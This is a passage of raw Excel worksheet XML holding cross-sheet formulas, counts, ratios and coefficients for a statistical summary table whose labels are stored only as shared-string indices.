        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$AO$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="H6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$AU$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$BA$79</f>
        <v>0.35454545454545455</v>
      </c>
      <c r="J6" s="365">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$BG$79</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="K6" s="455">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$BM$79</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="L6" s="456">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$BT$79</f>
        <v>0.92121212121212115</v>
      </c>
      <c r="M6" s="450">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$BZ$79</f>
        <v>0.24545454545454545</v>
      </c>
      <c r="N6" s="456">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$CG$79</f>
        <v>0.59090909090909094</v>
      </c>
      <c r="O6" s="572"/>
      <c r="P6" s="572"/>
      <c r="Q6" s="572"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B7" s="281">
        <f t="shared" ref="B7:N7" si="0">SUM(B8,B9)</f>
        <v>1751332</v>
      </c>
      <c r="C7" s="281">
        <f t="shared" si="0"/>
        <v>386161</v>
      </c>
      <c r="D7" s="281">
        <f t="shared" si="0"/>
        <v>2137493</v>
      </c>
      <c r="E7" s="281">
        <f t="shared" si="0"/>
        <v>6399378</v>
      </c>
      <c r="F7" s="281">
        <f t="shared" si="0"/>
        <v>3372954</v>
      </c>
      <c r="G7" s="281">
        <f t="shared" si="0"/>
        <v>9769207</v>
      </c>
      <c r="H7" s="281">
        <f t="shared" si="0"/>
        <v>6422</v>
      </c>
      <c r="I7" s="281">
        <f t="shared" si="0"/>
        <v>3940167</v>
      </c>
      <c r="J7" s="311">
        <f t="shared" si="0"/>
        <v>6071251</v>
      </c>
      <c r="K7" s="451">
        <f t="shared" si="0"/>
        <v>4714480</v>
      </c>
      <c r="L7" s="454">
        <f t="shared" si="0"/>
        <v>26934915</v>
      </c>
      <c r="M7" s="451">
        <f t="shared" si="0"/>
        <v>41896</v>
      </c>
      <c r="N7" s="454">
        <f t="shared" si="0"/>
        <v>2536466</v>
      </c>
      <c r="O7" s="572"/>
      <c r="P7" s="572"/>
      <c r="Q7" s="572"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!B9</f>
        <v>12783</v>
      </c>
      <c r="C8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!C9</f>
        <v>4878</v>
      </c>
      <c r="D8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!D9</f>
        <v>17661</v>
      </c>
      <c r="E8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!E9</f>
        <v>378848</v>
      </c>
      <c r="F8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!F9</f>
        <v>73630</v>
      </c>
      <c r="G8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!G9</f>
        <v>449353</v>
      </c>
      <c r="H8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!H9</f>
        <v>2</v>
      </c>
      <c r="I8" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!I9</f>
        <v>8104</v>
      </c>
      <c r="J8" s="311">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!J9</f>
        <v>25763</v>
      </c>
      <c r="K8" s="451">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!K9</f>
        <v>318431</v>
      </c>
      <c r="L8" s="454">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!L9</f>
        <v>1639887</v>
      </c>
      <c r="M8" s="449">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!M9</f>
        <v>19899</v>
      </c>
      <c r="N8" s="454">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!N9</f>
        <v>2488090</v>
      </c>
      <c r="O8" s="572"/>
      <c r="P8" s="572"/>
      <c r="Q8" s="572"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="12.2" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!B13</f>
        <v>1738549</v>
      </c>
      <c r="C9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!C13</f>
        <v>381283</v>
      </c>
      <c r="D9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!D13</f>
        <v>2119832</v>
      </c>
      <c r="E9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!E13</f>
        <v>6020530</v>
      </c>
      <c r="F9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!F13</f>
        <v>3299324</v>
      </c>
      <c r="G9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!G13</f>
        <v>9319854</v>
      </c>
      <c r="H9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!H13</f>
        <v>6420</v>
      </c>
      <c r="I9" s="281">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!I13</f>
        <v>3932063</v>
      </c>
      <c r="J9" s="311">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!J13</f>
        <v>6045488</v>
      </c>
      <c r="K9" s="451">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!K13</f>
        <v>4396049</v>
      </c>
      <c r="L9" s="454">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!L13</f>
        <v>25295028</v>
      </c>
      <c r="M9" s="449">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!M13</f>
        <v>21997</v>
      </c>
      <c r="N9" s="454">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!N13</f>
        <v>48376</v>
      </c>
      <c r="O9" s="572"/>
      <c r="P9" s="572"/>
      <c r="Q9" s="572"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1" thickBot="1">
      <c r="A10" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!B18</f>
        <v>136.00477196276304</v>
      </c>
      <c r="C10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!C18</f>
        <v>78.163796637966385</v>
      </c>
      <c r="D10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!D18</f>
        <v>120.02899043089293</v>
      </c>
      <c r="E10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!E18</f>
        <v>15.891676873046711</v>
      </c>
      <c r="F10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!F18</f>
        <v>44.809506994431615</v>
      </c>
      <c r="G10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!G18</f>
        <v>20.740607050581612</v>
      </c>
      <c r="H10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!H18</f>
        <v>3210</v>
      </c>
      <c r="I10" s="283">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!I18</f>
        <v>485.20027147087859</v>
      </c>
      <c r="J10" s="313">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!J18</f>
        <v>234.65776501183868</v>
      </c>
      <c r="K10" s="452">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!K18</f>
        <v>13.805342444674043</v>
      </c>
      <c r="L10" s="457">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!L18</f>
        <v>15.424860371476814</v>
      </c>
      <c r="M10" s="453">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!M18</f>
        <v>1.1054324337906427</v>
      </c>
      <c r="N10" s="457">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!N18</f>
        <v>1.9443026578620549E-2</v>
      </c>
      <c r="O10" s="572"/>
      <c r="P10" s="572"/>
      <c r="Q10" s="572"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A11" s="734" t="s">
        <v>4461</v>
      </c>
      <c r="B11" s="735"/>
      <c r="C11" s="735"/>
      <c r="D11" s="735"/>
      <c r="E11" s="735"/>
      <c r="F11" s="735"/>
      <c r="G11" s="735"/>
      <c r="H11" s="735"/>
      <c r="I11" s="735"/>
      <c r="J11" s="735"/>
      <c r="K11" s="735"/>
      <c r="L11" s="735"/>
      <c r="M11" s="735"/>
      <c r="N11" s="736"/>
      <c r="O11" s="572"/>
      <c r="P11" s="572"/>
      <c r="Q11" s="572"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="14.25" customHeight="1">
      <c r="A12" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B12" s="546">
        <v>0.31622600000000001</v>
      </c>
      <c r="C12" s="546">
        <v>0.63958999999999999</v>
      </c>
      <c r="D12" s="546">
        <v>0.66056300000000001</v>
      </c>
      <c r="E12" s="546">
        <v>0.73233099999999995</v>
      </c>
      <c r="F12" s="546">
        <v>0.76866699999999999</v>
      </c>
      <c r="G12" s="546">
        <v>0.84737399999999996</v>
      </c>
      <c r="H12" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I12" s="546">
        <v>0.53086100000000003</v>
      </c>
      <c r="J12" s="547">
        <v>0.71348699999999998</v>
      </c>
      <c r="K12" s="548">
        <v>0.66057699999999997</v>
      </c>
      <c r="L12" s="549">
        <v>0.87901300000000004</v>
      </c>
      <c r="M12" s="550">
        <v>0.49543300000000001</v>
      </c>
      <c r="N12" s="549">
        <v>0.78624499999999997</v>
      </c>
      <c r="O12" s="214"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="36.75" customHeight="1">
      <c r="A13" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B13" s="260" t="s">
        <v>4587</v>
      </c>
      <c r="C13" s="260" t="s">
        <v>4588</v>
      </c>
      <c r="D13" s="260" t="s">
        <v>4589</v>
      </c>
      <c r="E13" s="260" t="s">
        <v>4590</v>
      </c>
      <c r="F13" s="260" t="s">
        <v>4591</v>
      </c>
      <c r="G13" s="260" t="s">
        <v>4592</v>
      </c>
      <c r="H13" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I13" s="260" t="s">
        <v>4593</v>
      </c>
      <c r="J13" s="312" t="s">
        <v>4594</v>
      </c>
      <c r="K13" s="436" t="s">
        <v>4765</v>
      </c>
      <c r="L13" s="437" t="s">
        <v>4837</v>
      </c>
      <c r="M13" s="315" t="s">
        <v>4755</v>
      </c>
      <c r="N13" s="437" t="s">
        <v>4838</v>
      </c>
      <c r="O13" s="262"/>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="25.5">
      <c r="A14" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B14" s="281">
        <v>9</v>
      </c>
      <c r="C14" s="281">
        <v>13</v>
      </c>
      <c r="D14" s="281">
        <v>22</v>
      </c>
      <c r="E14" s="281">
        <v>41</v>
      </c>
      <c r="F14" s="281">
        <v>36</v>
      </c>
      <c r="G14" s="281">
        <v>77</v>
      </c>
      <c r="H14" s="281">
        <v>1</v>
      </c>
      <c r="I14" s="281">
        <v>11</v>
      </c>
      <c r="J14" s="454">
        <v>32</v>
      </c>
      <c r="K14" s="449">
        <v>5</v>
      </c>
      <c r="L14" s="454">
        <v>70</v>
      </c>
      <c r="M14" s="449">
        <v>2</v>
      </c>
      <c r="N14" s="454">
        <v>5</v>
      </c>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19">
      <c r="A15" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B15" s="364" t="s">
        <v>4595</v>
      </c>
      <c r="C15" s="364" t="s">
        <v>4596</v>
      </c>
      <c r="D15" s="364" t="s">
        <v>4305</v>
      </c>
      <c r="E15" s="364" t="s">
        <v>4586</v>
      </c>
      <c r="F15" s="364" t="s">
        <v>4309</v>
      </c>
      <c r="G15" s="364" t="s">
        <v>4597</v>
      </c>
      <c r="H15" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I15" s="364" t="s">
        <v>4598</v>
      </c>
      <c r="J15" s="456" t="s">
        <v>4599</v>
      </c>
      <c r="K15" s="613" t="s">
        <v>4305</v>
      </c>
      <c r="L15" s="456" t="s">
        <v>4784</v>
      </c>
      <c r="M15" s="364" t="s">
        <v>4766</v>
      </c>
      <c r="N15" s="456" t="s">
        <v>4747</v>
      </c>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19">
      <c r="A16" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B16" s="281">
        <f>B18+B17</f>
        <v>744</v>
      </c>
      <c r="C16" s="281">
        <f t="shared" ref="C16:J16" si="1">C18+C17</f>
        <v>8242</v>
      </c>
      <c r="D16" s="281">
        <f t="shared" si="1"/>
        <v>8986</v>
      </c>
      <c r="E16" s="281">
        <f t="shared" si="1"/>
        <v>180180</v>
      </c>
      <c r="F16" s="281">
        <f t="shared" si="1"/>
        <v>81342</v>
      </c>
      <c r="G16" s="281">
        <f t="shared" si="1"/>
        <v>261455</v>
      </c>
      <c r="H16" s="281">
        <f t="shared" si="1"/>
        <v>24</v>
      </c>
      <c r="I16" s="281">
        <f t="shared" si="1"/>
        <v>9183</v>
      </c>
      <c r="J16" s="311">
        <f t="shared" si="1"/>
        <v>18145</v>
      </c>
      <c r="K16" s="656">
        <f>K17+K18</f>
        <v>318599</v>
      </c>
      <c r="L16" s="449">
        <f t="shared" ref="L16:N16" si="2">L17+L18</f>
        <v>812921</v>
      </c>
      <c r="M16" s="656">
        <f t="shared" si="2"/>
        <v>19994</v>
      </c>
      <c r="N16" s="458">
        <f t="shared" si="2"/>
        <v>2508083</v>
      </c>
      <c r="O16" s="572"/>
      <c r="P16" s="572"/>
      <c r="Q16" s="572"/>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:19">
      <c r="A17" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B17" s="281">
        <v>87</v>
      </c>
      <c r="C17" s="281">
        <v>4862</v>
      </c>
      <c r="D17" s="281">
        <v>4949</v>
      </c>
      <c r="E17" s="281">
        <v>171675</v>
      </c>
      <c r="F17" s="281">
        <v>72825</v>
      </c>
      <c r="G17" s="281">
        <v>244433</v>
      </c>
      <c r="H17" s="281">
        <v>1</v>
      </c>
      <c r="I17" s="281">
        <v>7919</v>
      </c>
      <c r="J17" s="454">
        <v>12867</v>
      </c>
      <c r="K17" s="314">
        <v>318404</v>
      </c>
      <c r="L17" s="454">
        <v>806478</v>
      </c>
      <c r="M17" s="281">
        <v>19898</v>
      </c>
      <c r="N17" s="454">
        <v>2507979</v>
      </c>
      <c r="O17" s="572"/>
      <c r="P17" s="572"/>
      <c r="Q17" s="572"/>
      <c r="S17" s="214"/>
    </row>
    <row r="18" spans="1:19">
      <c r="A18" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B18" s="281">
        <v>657</v>
      </c>
      <c r="C18" s="281">
        <v>3380</v>
      </c>
      <c r="D18" s="281">
        <v>4037</v>
      </c>
      <c r="E18" s="281">
        <v>8505</v>
      </c>
      <c r="F18" s="281">
        <v>8517</v>
      </c>
      <c r="G18" s="281">
        <v>17022</v>
      </c>
      <c r="H18" s="281">
        <v>23</v>
      </c>
      <c r="I18" s="281">
        <v>1264</v>
      </c>
      <c r="J18" s="454">
        <v>5278</v>
      </c>
      <c r="K18" s="314">
        <v>195</v>
      </c>
      <c r="L18" s="454">
        <v>6443</v>
      </c>
      <c r="M18" s="281">
        <v>96</v>
      </c>
      <c r="N18" s="454">
        <v>104</v>
      </c>
      <c r="O18" s="572"/>
      <c r="P18" s="572"/>
      <c r="Q18" s="572"/>
      <c r="S18" s="214"/>
    </row>
    <row r="19" spans="1:19" ht="26.25" thickBot="1">
      <c r="A19" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B19" s="283">
        <f>B18/B17</f>
        <v>7.5517241379310347</v>
      </c>
      <c r="C19" s="283">
        <f t="shared" ref="C19:J19" si="3">C18/C17</f>
        <v>0.69518716577540107</v>
      </c>
      <c r="D19" s="283">
        <f t="shared" si="3"/>
        <v>0.81572034754495859</v>
      </c>
      <c r="E19" s="283">
        <f t="shared" si="3"/>
        <v>4.9541284403669728E-2</v>
      </c>
      <c r="F19" s="283">
        <f t="shared" si="3"/>
        <v>0.11695159629248197</v>
      </c>
      <c r="G19" s="283">
        <f t="shared" si="3"/>
        <v>6.9638714903470483E-2</v>
      </c>
      <c r="H19" s="283">
        <f t="shared" si="3"/>
        <v>23</v>
      </c>
      <c r="I19" s="283">
        <f t="shared" si="3"/>
        <v>0.1596161131455992</v>
      </c>
      <c r="J19" s="313">
        <f t="shared" si="3"/>
        <v>0.41019662703038784</v>
      </c>
      <c r="K19" s="368">
        <v>5.9999999999999995E-4</v>
      </c>
      <c r="L19" s="457">
        <v>0.1646</v>
      </c>
      <c r="M19" s="459">
        <v>4.7999999999999996E-3</v>
      </c>
      <c r="N19" s="457">
        <v>0</v>
      </c>
      <c r="O19" s="572"/>
      <c r="P19" s="572"/>
      <c r="Q19" s="572"/>
      <c r="S19" s="214"/>
    </row>
    <row r="20" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A20" s="737" t="s">
        <v>4462</v>
      </c>
      <c r="B20" s="735"/>
      <c r="C20" s="735"/>
      <c r="D20" s="735"/>
      <c r="E20" s="735"/>
      <c r="F20" s="735"/>
      <c r="G20" s="735"/>
      <c r="H20" s="735"/>
      <c r="I20" s="735"/>
      <c r="J20" s="735"/>
      <c r="K20" s="735"/>
      <c r="L20" s="735"/>
      <c r="M20" s="735"/>
      <c r="N20" s="736"/>
      <c r="O20" s="572"/>
      <c r="P20" s="572"/>
      <c r="Q20" s="572"/>
      <c r="S20" s="214"/>
    </row>
    <row r="21" spans="1:19" ht="14.25" customHeight="1">
      <c r="A21" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B21" s="546">
        <v>0.31622600000000001</v>
      </c>
      <c r="C21" s="546">
        <v>0.63958300000000001</v>
      </c>
      <c r="D21" s="546">
        <v>0.66055600000000003</v>
      </c>
      <c r="E21" s="546">
        <v>0.73231299999999999</v>
      </c>
      <c r="F21" s="546">
        <v>0.76864299999999997</v>
      </c>
      <c r="G21" s="546">
        <v>0.84733000000000003</v>
      </c>
      <c r="H21" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I21" s="546">
        <v>0.53085300000000002</v>
      </c>
      <c r="J21" s="547">
        <v>0.71347099999999997</v>
      </c>
      <c r="K21" s="548">
        <v>0.66057699999999997</v>
      </c>
      <c r="L21" s="549">
        <v>0.90948600000000002</v>
      </c>
      <c r="M21" s="550">
        <v>0.49543199999999998</v>
      </c>
      <c r="N21" s="549">
        <v>0.786242</v>
      </c>
      <c r="O21" s="214"/>
      <c r="S21" s="214"/>
    </row>
    <row r="22" spans="1:19" ht="36.75" customHeight="1">
      <c r="A22" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B22" s="260" t="s">
        <v>4587</v>
      </c>
      <c r="C22" s="260" t="s">
        <v>4600</v>
      </c>
      <c r="D22" s="260" t="s">
        <v>4601</v>
      </c>
      <c r="E22" s="260" t="s">
        <v>4602</v>
      </c>
      <c r="F22" s="260" t="s">
        <v>4603</v>
      </c>
      <c r="G22" s="260" t="s">
        <v>4604</v>
      </c>
      <c r="H22" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I22" s="260" t="s">
        <v>4605</v>
      </c>
      <c r="J22" s="437" t="s">
        <v>4606</v>
      </c>
      <c r="K22" s="315" t="s">
        <v>4765</v>
      </c>
      <c r="L22" s="437" t="s">
        <v>4839</v>
      </c>
      <c r="M22" s="315" t="s">
        <v>4759</v>
      </c>
      <c r="N22" s="437" t="s">
        <v>4840</v>
      </c>
      <c r="O22" s="262"/>
      <c r="S22" s="214"/>
    </row>
    <row r="23" spans="1:19" ht="25.5">
      <c r="A23" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B23" s="281">
        <v>9</v>
      </c>
      <c r="C23" s="281">
        <v>11</v>
      </c>
      <c r="D23" s="281">
        <v>20</v>
      </c>
      <c r="E23" s="281">
        <v>34</v>
      </c>
      <c r="F23" s="281">
        <v>29</v>
      </c>
      <c r="G23" s="281">
        <v>63</v>
      </c>
      <c r="H23" s="281">
        <v>1</v>
      </c>
      <c r="I23" s="281">
        <v>7</v>
      </c>
      <c r="J23" s="454">
        <v>26</v>
      </c>
      <c r="K23" s="314">
        <v>5</v>
      </c>
      <c r="L23" s="454">
        <v>64</v>
      </c>
      <c r="M23" s="281">
        <v>1</v>
      </c>
      <c r="N23" s="454">
        <v>3</v>
      </c>
      <c r="S23" s="214"/>
    </row>
    <row r="24" spans="1:19">
      <c r="A24" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B24" s="364" t="s">
        <v>4595</v>
      </c>
      <c r="C24" s="364" t="s">
        <v>4596</v>
      </c>
      <c r="D24" s="364" t="s">
        <v>4305</v>
      </c>
      <c r="E24" s="364" t="s">
        <v>4586</v>
      </c>
      <c r="F24" s="364" t="s">
        <v>4309</v>
      </c>
      <c r="G24" s="364" t="s">
        <v>4597</v>
      </c>
      <c r="H24" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I24" s="364" t="s">
        <v>4598</v>
      </c>
      <c r="J24" s="456" t="s">
        <v>4599</v>
      </c>
      <c r="K24" s="613" t="s">
        <v>4305</v>
      </c>
      <c r="L24" s="456" t="s">
        <v>4841</v>
      </c>
      <c r="M24" s="364" t="s">
        <v>4766</v>
      </c>
      <c r="N24" s="456" t="s">
        <v>4747</v>
      </c>
      <c r="S24" s="214"/>
    </row>
    <row r="25" spans="1:19">
      <c r="A25" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B25" s="281">
        <f t="shared" ref="B25:J25" si="4">B27+B26</f>
        <v>744</v>
      </c>
      <c r="C25" s="281">
        <f t="shared" si="4"/>
        <v>9767</v>
      </c>
      <c r="D25" s="281">
        <f t="shared" si="4"/>
        <v>10511</v>
      </c>
      <c r="E25" s="281">
        <f t="shared" si="4"/>
        <v>185830</v>
      </c>
      <c r="F25" s="281">
        <f t="shared" si="4"/>
        <v>86326</v>
      </c>
      <c r="G25" s="281">
        <f t="shared" si="4"/>
        <v>272089</v>
      </c>
      <c r="H25" s="281">
        <f t="shared" si="4"/>
        <v>24</v>
      </c>
      <c r="I25" s="281">
        <f t="shared" si="4"/>
        <v>11838</v>
      </c>
      <c r="J25" s="311">
        <f t="shared" si="4"/>
        <v>22325</v>
      </c>
      <c r="K25" s="656">
        <f>K26+K27</f>
        <v>318599</v>
      </c>
      <c r="L25" s="449">
        <f t="shared" ref="L25" si="5">L26+L27</f>
        <v>817192</v>
      </c>
      <c r="M25" s="656">
        <f t="shared" ref="M25" si="6">M26+M27</f>
        <v>20519</v>
      </c>
      <c r="N25" s="458">
        <f t="shared" ref="N25" si="7">N26+N27</f>
        <v>2509133</v>
      </c>
      <c r="O25" s="572"/>
      <c r="P25" s="572"/>
      <c r="Q25" s="572"/>
      <c r="S25" s="214"/>
    </row>
    <row r="26" spans="1:19">
      <c r="A26" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B26" s="281">
        <v>87</v>
      </c>
      <c r="C26" s="281">
        <v>4866</v>
      </c>
      <c r="D26" s="281">
        <v>4953</v>
      </c>
      <c r="E26" s="281">
        <v>171782</v>
      </c>
      <c r="F26" s="281">
        <v>72834</v>
      </c>
      <c r="G26" s="281">
        <v>244549</v>
      </c>
      <c r="H26" s="281">
        <v>1</v>
      </c>
      <c r="I26" s="281">
        <v>8087</v>
      </c>
      <c r="J26" s="454">
        <v>13039</v>
      </c>
      <c r="K26" s="314">
        <v>318404</v>
      </c>
      <c r="L26" s="454">
        <v>806497</v>
      </c>
      <c r="M26" s="281">
        <v>19899</v>
      </c>
      <c r="N26" s="454">
        <v>2507981</v>
      </c>
      <c r="O26" s="572"/>
      <c r="P26" s="572"/>
      <c r="Q26" s="572"/>
      <c r="S26" s="214"/>
    </row>
    <row r="27" spans="1:19">
      <c r="A27" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B27" s="281">
        <v>657</v>
      </c>
      <c r="C27" s="281">
        <v>4901</v>
      </c>
      <c r="D27" s="281">
        <v>5558</v>
      </c>
      <c r="E27" s="281">
        <v>14048</v>
      </c>
      <c r="F27" s="281">
        <v>13492</v>
      </c>
      <c r="G27" s="281">
        <v>27540</v>
      </c>
      <c r="H27" s="281">
        <v>23</v>
      </c>
      <c r="I27" s="281">
        <v>3751</v>
      </c>
      <c r="J27" s="458">
        <v>9286</v>
      </c>
      <c r="K27" s="314">
        <v>195</v>
      </c>
      <c r="L27" s="454">
        <v>10695</v>
      </c>
      <c r="M27" s="281">
        <v>620</v>
      </c>
      <c r="N27" s="454">
        <v>1152</v>
      </c>
      <c r="O27" s="572"/>
      <c r="P27" s="572"/>
      <c r="Q27" s="572"/>
      <c r="S27" s="214"/>
    </row>
    <row r="28" spans="1:19" ht="26.25" thickBot="1">
      <c r="A28" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B28" s="283">
        <f t="shared" ref="B28:J28" si="8">B27/B26</f>
        <v>7.5517241379310347</v>
      </c>
      <c r="C28" s="283">
        <f t="shared" si="8"/>
        <v>1.007192766132347</v>
      </c>
      <c r="D28" s="283">
        <f t="shared" si="8"/>
        <v>1.1221481930143347</v>
      </c>
      <c r="E28" s="283">
        <f t="shared" si="8"/>
        <v>8.17780675507329E-2</v>
      </c>
      <c r="F28" s="283">
        <f t="shared" si="8"/>
        <v>0.18524315566905566</v>
      </c>
      <c r="G28" s="283">
        <f t="shared" si="8"/>
        <v>0.11261546765678862</v>
      </c>
      <c r="H28" s="283">
        <f t="shared" si="8"/>
        <v>23</v>
      </c>
      <c r="I28" s="283">
        <f t="shared" si="8"/>
        <v>0.46383083961914184</v>
      </c>
      <c r="J28" s="283">
        <f t="shared" si="8"/>
        <v>0.71217117877137814</v>
      </c>
      <c r="K28" s="368">
        <v>5.9999999999999995E-4</v>
      </c>
      <c r="L28" s="457">
        <v>0.27350000000000002</v>
      </c>
      <c r="M28" s="459">
        <v>3.1099999999999999E-2</v>
      </c>
      <c r="N28" s="457">
        <v>2.0000000000000001E-4</v>
      </c>
      <c r="O28" s="572"/>
      <c r="P28" s="572"/>
      <c r="Q28" s="572"/>
      <c r="S28" s="214"/>
    </row>
    <row r="29" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A29" s="734" t="s">
        <v>4312</v>
      </c>
      <c r="B29" s="735"/>
      <c r="C29" s="735"/>
      <c r="D29" s="735"/>
      <c r="E29" s="735"/>
      <c r="F29" s="735"/>
      <c r="G29" s="735"/>
      <c r="H29" s="735"/>
      <c r="I29" s="735"/>
      <c r="J29" s="735"/>
      <c r="K29" s="735"/>
      <c r="L29" s="735"/>
      <c r="M29" s="735"/>
      <c r="N29" s="736"/>
      <c r="O29" s="572"/>
      <c r="P29" s="572"/>
      <c r="Q29" s="572"/>
      <c r="S29" s="214"/>
    </row>
    <row r="30" spans="1:19" ht="14.25" customHeight="1">
      <c r="A30" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B30" s="546">
        <v>0.79475399999999996</v>
      </c>
      <c r="C30" s="546">
        <v>0.64592799999999995</v>
      </c>
      <c r="D30" s="546">
        <v>0.84354300000000004</v>
      </c>
      <c r="E30" s="546">
        <v>0.91151499999999996</v>
      </c>
      <c r="F30" s="546">
        <v>0.97661600000000004</v>
      </c>
      <c r="G30" s="546">
        <v>0.95856300000000005</v>
      </c>
      <c r="H30" s="546">
        <v>9.5341999999999996E-2</v>
      </c>
      <c r="I30" s="546">
        <v>0.58183099999999999</v>
      </c>
      <c r="J30" s="547">
        <v>0.84423099999999995</v>
      </c>
      <c r="K30" s="548">
        <v>0.66807399999999995</v>
      </c>
      <c r="L30" s="549">
        <v>0.85142499999999999</v>
      </c>
      <c r="M30" s="550">
        <v>0.49543199999999998</v>
      </c>
      <c r="N30" s="549">
        <v>0.78623600000000005</v>
      </c>
      <c r="O30" s="214" t="s">
        <v>2311</v>
      </c>
      <c r="S30" s="214"/>
    </row>
    <row r="31" spans="1:19" ht="36.75" customHeight="1">
      <c r="A31" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B31" s="260" t="s">
        <v>4607</v>
      </c>
      <c r="C31" s="260" t="s">
        <v>4608</v>
      </c>
      <c r="D31" s="260" t="s">
        <v>4609</v>
      </c>
      <c r="E31" s="260" t="s">
        <v>4610</v>
      </c>
      <c r="F31" s="260" t="s">
        <v>4611</v>
      </c>
      <c r="G31" s="260" t="s">
        <v>4612</v>
      </c>
      <c r="H31" s="260" t="s">
        <v>4129</v>
      </c>
      <c r="I31" s="260" t="s">
        <v>4613</v>
      </c>
      <c r="J31" s="312" t="s">
        <v>4614</v>
      </c>
      <c r="K31" s="436" t="s">
        <v>4767</v>
      </c>
      <c r="L31" s="437" t="s">
        <v>4842</v>
      </c>
      <c r="M31" s="315" t="s">
        <v>4768</v>
      </c>
      <c r="N31" s="437" t="s">
